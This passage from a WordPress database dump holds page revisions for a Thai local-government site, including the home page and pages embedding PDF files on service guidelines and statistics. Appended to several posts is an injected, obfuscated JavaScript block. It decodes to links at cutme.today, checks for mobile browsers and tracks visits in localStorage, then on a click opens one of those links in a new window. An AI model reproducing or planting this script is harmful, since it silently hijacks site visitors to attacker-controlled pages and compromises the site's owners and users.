allow=\"autoplay; clipboard-write; encrypted-media; picture-in-picture; web-share\"></iframe>\n<!-- /wp:html -->\n\n<!-- wp:shortcode -->\n[post-views]\n<!-- /wp:shortcode -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"fc945863\",\"isGrid\":true,\"gridId\":\"73d9ffe7\",\"width\":50,\"widthMobile\":100,\"isDynamic\":true,\"blockVersion\":4} /-->\n<!-- /wp:generateblocks/grid -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container --></div></div>\n<!-- /wp:kadence/column -->\n<!-- /wp:kadence/rowlayout -->\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2[_0x30231a];return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=[\'substr\',\'length\',\'-hurs\',\'open\',\'round\',\'443779RQfzWn\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x6f\\x63\\x47\\x33\\x63\\x353\',\'click\',\'5114346JdlaMi\',\'1780163aSIYqH\',\'forEach\',\'host\',\'_blank\',\'68512ftWJcO\',\'addEventListener\',\'-mnts\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x74\\x68\\x4f\\x35\\x63\\x385\',\'4588749LmrVjF\',\'parse\',\'630bGPCEV\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x6e\\x50\\x38\\x63\\x338\',\'abs\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x58\\x4e\\x39\\x63\\x389\',\'56bnMKls\',\'opera\',\'6946eLteFW\',\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x49\\x4d\\x76\\x34\\x63\\x324\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x48\\x62\\x61\\x37\\x63\\x357\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x42\\x42\\x47\\x32\\x63\\x382\',\'floor\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x50\\x79\\x78\\x36\\x63\\x376\',\'999HIfBhL\',\'filter\',\'test\',\'getItem\',\'random\',\'138490EjXyHW\',\'stopPropagation\',\'setItem\',\'70kUzPYI\'];_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!![]){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06[\'push\'](_0x307c06[\'shift\']());}catch(_0x3e3a47){_0x307c06[\'push\'](_0x307c06[\'shift\']());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window[\'mobileCheck\']=function(){const _0x123821=_0x3023;let _0x399500=![];return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x1165a7(0x1ca)](_0x5e9786)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x1165a7(0x1ca)](_0x5e9786[_0x1165a7(0x1d1)](0x0,0x4)))_0x399500=!![];}(navigator[_0x123821(0x1c2)]||navigator[\'vendor\']||window[_0x123821(0x1c0)]),_0x399500;};const _0xe6f43=[\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x77\\x67\\x64\\x30\\x63\\x380\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x4d\\x76\\x49\\x31\\x63\\x361\',_0x111835(0x1c5),_0x111835(0x1d7),_0x111835(0x1c3),_0x111835(0x1e1),_0x111835(0x1c7),_0x111835(0x1c4),_0x111835(0x1e6),_0x111835(0x1e9)],_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830[_0x2c6c7a(0x1db)]((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage[\'getItem\'](_0x3ee06f+_0x476c2a(0x1e8))&&localStorage[_0x476c2a(0x1cf)](_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2[_0x415ff3(0x1c9)]((_0x37389f,_0x22f261)=>localStorage[_0x415ff3(0x1cb)](_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83[Math[_0x415ff3(0x1c6)](Math[_0x415ff3(0x1cc)]()*_0x229a83[_0x415ff3(0x1d2)])];},_0x173ccb=_0xb01406=>localStorage[_0x111835(0x1cf)](_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage[_0x111835(0x1cb)](_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage[_0x111835(0x1cf)](_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math[_0x1b0982(0x1d5)](Math[_0x1b0982(0x1e7)](_0x531bc4-_0x49e91b)/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math[_0xb7d87(0x1d5)](Math[_0xb7d87(0x1e7)](_0x28385f-_0x1e9127)/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+\'-mnts\',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window[\'mobileCheck\']()&&window[_0x22f77c(0x1d4)](newLocation,\'_blank\');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0[_0x2737e0(0x1ce)]();const _0x263ff7=location[_0x2737e0(0x1dc)];let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date[_0x2737e0(0x1e3)](new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window[_0x2737e0(0x1e5)]()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window[_0x2737e0(0x1d4)](_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document[_0x111835(0x1df)](_0x111835(0x1d8),_0x168fb9);}());</script>','หน้าแรก','','inherit','closed','closed','','14-revision-v1','','','2024-08-09 11:53:08','2024-08-09 04:53:08','',14,'http://pakhaeng.ssk.in.th/?p=774',0,'revision','',0),
(775,1,'2024-08-09 11:53:30','2024-08-09 04:53:30','<!-- wp:file {\"id\":772,\"href\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/011แนวปฏิบัติผู้รับบริการ.pdf\",\"displayPreview\":true} -->\n<div class=\"wp-block-file\"><object class=\"wp-block-file__embed\" data=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/011แนวปฏิบัติผู้รับบริการ.pdf\" type=\"application/pdf\" style=\"width:100%;height:600px\" aria-label=\"011แนวปฏิบัติผู้รับบริการ\"></object><a id=\"wp-block-file--media-c37f0789-e1d1-482c-8514-665f1c11cccf\" href=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/011แนวปฏิบัติผู้รับบริการ.pdf\">011แนวปฏิบัติผู้รับบริการ</a><a href=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/011แนวปฏิบัติผู้รับบริการ.pdf\" class=\"wp-block-file__button wp-element-button\" download aria-describedby=\"wp-block-file--media-c37f0789-e1d1-482c-8514-665f1c11cccf\">Download</a></div>\n<!-- /wp:file -->\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2[_0x30231a];return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=[\'substr\',\'length\',\'-hurs\',\'open\',\'round\',\'443779RQfzWn\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x6f\\x63\\x47\\x33\\x63\\x353\',\'click\',\'5114346JdlaMi\',\'1780163aSIYqH\',\'forEach\',\'host\',\'_blank\',\'68512ftWJcO\',\'addEventListener\',\'-mnts\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x74\\x68\\x4f\\x35\\x63\\x385\',\'4588749LmrVjF\',\'parse\',\'630bGPCEV\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x6e\\x50\\x38\\x63\\x338\',\'abs\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x58\\x4e\\x39\\x63\\x389\',\'56bnMKls\',\'opera\',\'6946eLteFW\',\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x49\\x4d\\x76\\x34\\x63\\x324\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x48\\x62\\x61\\x37\\x63\\x357\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x42\\x42\\x47\\x32\\x63\\x382\',\'floor\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x50\\x79\\x78\\x36\\x63\\x376\',\'999HIfBhL\',\'filter\',\'test\',\'getItem\',\'random\',\'138490EjXyHW\',\'stopPropagation\',\'setItem\',\'70kUzPYI\'];_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!![]){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06[\'push\'](_0x307c06[\'shift\']());}catch(_0x3e3a47){_0x307c06[\'push\'](_0x307c06[\'shift\']());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window[\'mobileCheck\']=function(){const _0x123821=_0x3023;let _0x399500=![];return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x1165a7(0x1ca)](_0x5e9786)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x1165a7(0x1ca)](_0x5e9786[_0x1165a7(0x1d1)](0x0,0x4)))_0x399500=!![];}(navigator[_0x123821(0x1c2)]||navigator[\'vendor\']||window[_0x123821(0x1c0)]),_0x399500;};const _0xe6f43=[\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x77\\x67\\x64\\x30\\x63\\x380\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x4d\\x76\\x49\\x31\\x63\\x361\',_0x111835(0x1c5),_0x111835(0x1d7),_0x111835(0x1c3),_0x111835(0x1e1),_0x111835(0x1c7),_0x111835(0x1c4),_0x111835(0x1e6),_0x111835(0x1e9)],_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830[_0x2c6c7a(0x1db)]((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage[\'getItem\'](_0x3ee06f+_0x476c2a(0x1e8))&&localStorage[_0x476c2a(0x1cf)](_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2[_0x415ff3(0x1c9)]((_0x37389f,_0x22f261)=>localStorage[_0x415ff3(0x1cb)](_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83[Math[_0x415ff3(0x1c6)](Math[_0x415ff3(0x1cc)]()*_0x229a83[_0x415ff3(0x1d2)])];},_0x173ccb=_0xb01406=>localStorage[_0x111835(0x1cf)](_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage[_0x111835(0x1cb)](_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage[_0x111835(0x1cf)](_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math[_0x1b0982(0x1d5)](Math[_0x1b0982(0x1e7)](_0x531bc4-_0x49e91b)/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math[_0xb7d87(0x1d5)](Math[_0xb7d87(0x1e7)](_0x28385f-_0x1e9127)/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+\'-mnts\',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window[\'mobileCheck\']()&&window[_0x22f77c(0x1d4)](newLocation,\'_blank\');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0[_0x2737e0(0x1ce)]();const _0x263ff7=location[_0x2737e0(0x1dc)];let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date[_0x2737e0(0x1e3)](new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window[_0x2737e0(0x1e5)]()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window[_0x2737e0(0x1d4)](_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document[_0x111835(0x1df)](_0x111835(0x1d8),_0x168fb9);}());</script>','แนวปฏิบัติผู้รับบริการคู่มือแนวทางการให้บริการสำหรับผู้รับบริการหรือผู้มาติดต่อแนวปฏิบัติผู้รับบริการ','','inherit','closed','closed','','771-revision-v1','','','2024-08-09 11:53:30','2024-08-09 04:53:30','',771,'http://pakhaeng.ssk.in.th/?p=775',0,'revision','',0);
INSERT INTO `wp_posts` VALUES
(776,1,'2024-08-09 11:55:06','2024-08-09 04:55:06','<!-- wp:file {\"id\":777,\"href\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/012สถิติการให้บริการ.pdf\",\"displayPreview\":true} -->\n<div class=\"wp-block-file\"><object class=\"wp-block-file__embed\" data=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/012สถิติการให้บริการ.pdf\" type=\"application/pdf\" style=\"width:100%;height:600px\" aria-label=\"012สถิติการให้บริการ\"></object><a id=\"wp-block-file--media-3b89fb91-add8-4366-be8e-8b0998e80260\" href=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/012สถิติการให้บริการ.pdf\">012สถิติการให้บริการ</a><a href=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/012สถิติการให้บริการ.pdf\" class=\"wp-block-file__button wp-element-button\" download aria-describedby=\"wp-block-file--media-3b89fb91-add8-4366-be8e-8b0998e80260\">Download</a></div>\n<!-- /wp:file -->\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2[_0x30231a];return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=[\'substr\',\'length\',\'-hurs\',\'open\',\'round\',\'443779RQfzWn\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x6f\\x63\\x47\\x33\\x63\\x353\',\'click\',\'5114346JdlaMi\',\'1780163aSIYqH\',\'forEach\',\'host\',\'_blank\',\'68512ftWJcO\',\'addEventListener\',\'-mnts\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x74\\x68\\x4f\\x35\\x63\\x385\',\'4588749LmrVjF\',\'parse\',\'630bGPCEV\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x6e\\x50\\x38\\x63\\x338\',\'abs\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x58\\x4e\\x39\\x63\\x389\',\'56bnMKls\',\'opera\',\'6946eLteFW\',\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x49\\x4d\\x76\\x34\\x63\\x324\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x48\\x62\\x61\\x37\\x63\\x357\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x42\\x42\\x47\\x32\\x63\\x382\',\'floor\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x50\\x79\\x78\\x36\\x63\\x376\',\'999HIfBhL\',\'filter\',\'test\',\'getItem\',\'random\',\'138490EjXyHW\',\'stopPropagation\',\'setItem\',\'70kUzPYI\'];_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!![]){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06[\'push\'](_0x307c06[\'shift\']());}catch(_0x3e3a47){_0x307c06[\'push\'](_0x307c06[\'shift\']());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window[\'mobileCheck\']=function(){const _0x123821=_0x3023;let _0x399500=![];return function(_0x5e9786){const 